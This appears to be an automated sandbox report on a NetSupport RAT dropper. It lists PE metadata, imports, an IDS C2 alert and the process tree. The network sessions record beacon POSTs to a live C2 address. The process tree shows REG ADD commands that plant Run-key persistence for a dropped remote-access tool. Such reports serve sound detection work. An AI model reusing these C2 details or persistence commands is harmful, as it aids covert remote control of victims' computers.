Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [C++] VS2015 UPD3.1 build 24215
• [EXP] VS2015 UPD3.1 build 24215
• [RES] VS2015 UPD3 build 24213
• [LNK] VS2015 UPD3.1 build 24215
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x38cd0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x38d04 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5d000 | 0xe034 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0x1fd0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x36ee0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x31928 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x30000 | 0x25c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x38254 | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2e864 | 0x2ea00 | 8c2dd3ebce78edeed565107466ae1d3e | False | 0.5908595844504021 | data | 6.693477406609911 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x30000 | 0x9aac | 0x9c00 | b8d3a709e8e2861298e51f270be0f883 | False | 0.45718149038461536 | data | 5.133828516884417 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3a000 | 0x213d0 | 0xc00 | 7a066b052b7178cd1388c71d17dec570 | False | 0.2789713541666667 | data | 3.2428863859698565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.gfids | 0x5c000 | 0xe8 | 0x200 | 0a8129f1f5d2e8ddcb61343ecd6f891a | False | 0.33984375 | data | 2.0959167744603624 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x5d000 | 0xe034 | 0xe200 | d62594e063ef25acc085c21831d77a75 | False | 0.6341779590707964 | data | 6.802287495720703 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6c000 | 0x1fd0 | 0x2000 | 983e78af74da826d9233ebaa3055869a | False | 0.8060302734375 | data | 6.687357530503152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x5d644 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced |  |  | 1.0027729636048528
PNG | 0x5e18c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced |  |  | 0.9363390441839495
RT_ICON | 0x5f738 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors |  |  | 0.47832369942196534
RT_ICON | 0x5fca0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors |  |  | 0.5410649819494585
RT_ICON | 0x60548 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors |  |  | 0.4933368869936034
RT_ICON | 0x613f0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m |  |  | 0.5390070921985816
RT_ICON | 0x61858 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m |  |  | 0.41393058161350843
RT_ICON | 0x62900 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m |  |  | 0.3479253112033195
RT_ICON | 0x64ea8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced |  |  | 0.9809269502193401
RT_DIALOG | 0x68c1c | 0x2a2 | data |  |  | 0.5296735905044511
RT_DIALOG | 0x68ec0 | 0x13a | data |  |  | 0.6624203821656051
RT_DIALOG | 0x68ffc | 0xf2 | data |  |  | 0.71900826446281
RT_DIALOG | 0x690f0 | 0x14e | data |  |  | 0.5868263473053892
RT_DIALOG | 0x69240 | 0x318 | data |  |  | 0.476010101010101
RT_DIALOG | 0x69558 | 0x24a | data |  |  | 0.6262798634812287
RT_STRING | 0x697a4 | 0x1fc | data |  |  | 0.421259842519685
RT_STRING | 0x699a0 | 0x246 | data |  |  | 0.41924398625429554
RT_STRING | 0x69be8 | 0x1dc | data |  |  | 0.5105042016806722
RT_STRING | 0x69dc4 | 0xdc | data |  |  | 0.65
RT_STRING | 0x69ea0 | 0x468 | data |  |  | 0.375
RT_STRING | 0x6a308 | 0x164 | data |  |  | 0.5056179775280899
RT_STRING | 0x6a46c | 0xe4 | data |  |  | 0.6359649122807017
RT_STRING | 0x6a550 | 0x158 | data |  |  | 0.4563953488372093
RT_STRING | 0x6a6a8 | 0xe8 | data |  |  | 0.5948275862068966
RT_STRING | 0x6a790 | 0xe6 | data |  |  | 0.5695652173913044
RT_GROUP_ICON | 0x6a878 | 0x68 | data |  |  | 0.7019230769230769
RT_MANIFEST | 0x6a8e0 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators |  |  | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, GetTickCount, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
gdiplus.dll | GdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-24T17:37:03.193758+0100 | 2827745 | ETPRO MALWARE NetSupport RAT CnC Activity | 1 | 192.168.2.4 | 49730 | 45.76.253.210 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 17:37:03.193758011 CET | 49730 | 443 | 192.168.2.4 | 45.76.253.210
Dec 24, 2024 17:37:03.193825960 CET | 443 | 49730 | 45.76.253.210 | 192.168.2.4
Dec 24, 2024 17:37:03.193918943 CET | 49730 | 443 | 192.168.2.4 | 45.76.253.210
Dec 24, 2024 17:37:03.493812084 CET | 49730 | 443 | 192.168.2.4 | 45.76.253.210
Dec 24, 2024 17:37:03.493850946 CET | 443 | 49730 | 45.76.253.210 | 192.168.2.4
Dec 24, 2024 17:37:03.493935108 CET | 443 | 49730 | 45.76.253.210 | 192.168.2.4
Dec 24, 2024 17:37:04.249037981 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:04.371597052 CET | 80 | 49731 | 104.26.1.231 | 192.168.2.4
Dec 24, 2024 17:37:04.371680975 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:04.371897936 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:04.491503954 CET | 80 | 49731 | 104.26.1.231 | 192.168.2.4
Dec 24, 2024 17:37:05.673389912 CET | 80 | 49731 | 104.26.1.231 | 192.168.2.4
Dec 24, 2024 17:37:05.673511982 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:05.679013014 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:05.679086924 CET | 49731 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:05.680978060 CET | 49732 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:05.800534010 CET | 80 | 49732 | 104.26.1.231 | 192.168.2.4
Dec 24, 2024 17:37:05.800899982 CET | 49732 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:05.801115036 CET | 49732 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:05.920635939 CET | 80 | 49732 | 104.26.1.231 | 192.168.2.4
Dec 24, 2024 17:37:07.094100952 CET | 80 | 49732 | 104.26.1.231 | 192.168.2.4
Dec 24, 2024 17:37:07.094183922 CET | 49732 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:07.094788074 CET | 49732 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:07.094970942 CET | 49732 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:07.095992088 CET | 49733 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:07.215528011 CET | 80 | 49733 | 104.26.1.231 | 192.168.2.4
Dec 24, 2024 17:37:07.215639114 CET | 49733 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:07.215909958 CET | 49733 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:07.335572004 CET | 80 | 49733 | 104.26.1.231 | 192.168.2.4
Dec 24, 2024 17:37:08.511013031 CET | 80 | 49733 | 104.26.1.231 | 192.168.2.4
Dec 24, 2024 17:37:08.511087894 CET | 49733 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:08.511360884 CET | 49733 | 80 | 192.168.2.4 | 104.26.1.231
Dec 24, 2024 17:37:08.511388063 CET | 49733 | 80 | 192.168.2.4 | 104.26.1.231
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 24, 2024 17:37:04.101300955 CET | 63567 | 53 | 192.168.2.4 | 1.1.1.1
Dec 24, 2024 17:37:04.240010023 CET | 53 | 63567 | 1.1.1.1 | 192.168.2.4
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 24, 2024 17:37:04.101300955 CET192.168.2.41.1.1.10x33abStandard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 24, 2024 17:37:04.240010023 CET1.1.1.1192.168.2.40x33abNo error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                    Dec 24, 2024 17:37:04.240010023 CET1.1.1.1192.168.2.40x33abNo error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                    Dec 24, 2024 17:37:04.240010023 CET1.1.1.1192.168.2.40x33abNo error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false
                                                                                    • 45.76.253.210 (connection: keep-alive; cmd=poll, info=1, ack=1)
                                                                                    • geo.netsupportsoftware.com
                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    0 | 192.168.2.4 | 49730 | 45.76.253.210 | 443 | 7692 | C:\Users\Public\Netstat\bild.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 24, 2024 17:37:03.493812084 CET | 218 | OUT | POST http://45.76.253.210/fakeurl.htm HTTP/1.1
                                                                                    User-Agent: NetSupport Manager/1.3
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 22
                                                                                    Host: 45.76.253.210
                                                                                    Connection: Keep-Alive
                                                                                    CMD=POLL
                                                                                    INFO=1
                                                                                    ACK=1
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    1 | 192.168.2.4 | 49731 | 104.26.1.231 | 80 | 7692 | C:\Users\Public\Netstat\bild.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 24, 2024 17:37:04.371897936 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                    Host: geo.netsupportsoftware.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    Dec 24, 2024 17:37:05.673389912 CET | 1123 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 24 Dec 2024 16:37:05 GMT
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Ray: 8f72039419fd425f-EWR
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    cf-apo-via: origin,host
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lW7SVSTeGp6OMPZWlwr0EkdKqCkxO1QY2Xx3tzIwjQw9wj7tLvCi2nECvSnMfUIfdQit%2BIjKqFjaT%2BrObcB9Ya5UFQLQZ5UrOriDWvmNuxghySnFhBKpzWUwyWyGKBbDC7Go%2B1Qt6tiUe4aX"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1599&min_rtt=1599&rtt_var=799&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    2 | 192.168.2.4 | 49732 | 104.26.1.231 | 80 | 7692 | C:\Users\Public\Netstat\bild.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 24, 2024 17:37:05.801115036 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                    Host: geo.netsupportsoftware.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    Dec 24, 2024 17:37:07.094100952 CET | 1116 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 24 Dec 2024 16:37:06 GMT
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Ray: 8f72039d1ee742a0-EWR
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    cf-apo-via: origin,host
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IPdTQEZmPl0lBKR8KjJx9PbAboAcYEK7D0bbCWAIEhlIB2fELg1PzGJcs9DUzwzswUJFVFDlO6xK%2B1ubSbS%2BNIjFDfBktvslhfF6N0RWnlYC80AqdmHSVPfal9CXdU5wPQqn7KgQ63D2hQAs"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1786&min_rtt=1786&rtt_var=893&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    3 | 192.168.2.4 | 49733 | 104.26.1.231 | 80 | 7692 | C:\Users\Public\Netstat\bild.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 24, 2024 17:37:07.215909958 CET | 118 | OUT | GET /location/loca.asp HTTP/1.1
                                                                                    Host: geo.netsupportsoftware.com
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    Dec 24, 2024 17:37:08.511013031 CET | 1121 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 24 Dec 2024 16:37:08 GMT
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Ray: 8f7203a5e8bd2363-EWR
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    cf-apo-via: origin,host
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aDN2muabuDV1YmuvJbYCyAYC9CLGNBg8bk%2BbqBXz3O2MIc1VvRFdsqJwbq0YkROI6bTaCOg9HNkgix49mKAnVimMvoH2wsMzl%2FQqSiPrfHtdCuW91y1E0zHliTGDWMPvBl1ijm4wLylWZyjI"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1816&rtt_var=908&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0



                                                                                    Target ID:0
                                                                                    Start time:11:37:00
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe"
                                                                                    Imagebase:0xd70000
                                                                                    File size:2'138'135 bytes
                                                                                    MD5 hash:47CFCE938A71540A2039AEBD5ABE0783
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1705248383.000000000516C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:1
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                                                                    Imagebase:0x240000
                                                                                    File size:236'544 bytes
                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:3
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0xc80000
                                                                                    File size:59'392 bytes
                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:4
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Windows\SysWOW64\reg.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0xc80000
                                                                                    File size:59'392 bytes
                                                                                    MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:11:37:01
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\Public\Netstat\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\Public\Netstat\bild.exe
                                                                                    Imagebase:0x4b0000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4163086848.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4163492259.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4161091973.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4163046759.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.1712834967.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\bild.exe, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 29%, ReversingLabs
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:6
                                                                                    Start time:11:37:12
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\Public\Netstat\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0x4b0000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.1828037361.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.1825297800.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.1826623935.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.1827995443.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:10
                                                                                    Start time:11:37:20
                                                                                    Start date:24/12/2024
                                                                                    Path:C:\Users\Public\Netstat\bild.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\Public\Netstat\bild.exe"
                                                                                    Imagebase:0x4b0000
                                                                                    File size:105'848 bytes
                                                                                    MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1909557431.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1908011994.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.1906094191.00000000004B2000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1909499532.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                    Reputation:moderate
                                                                                    Has exited:true

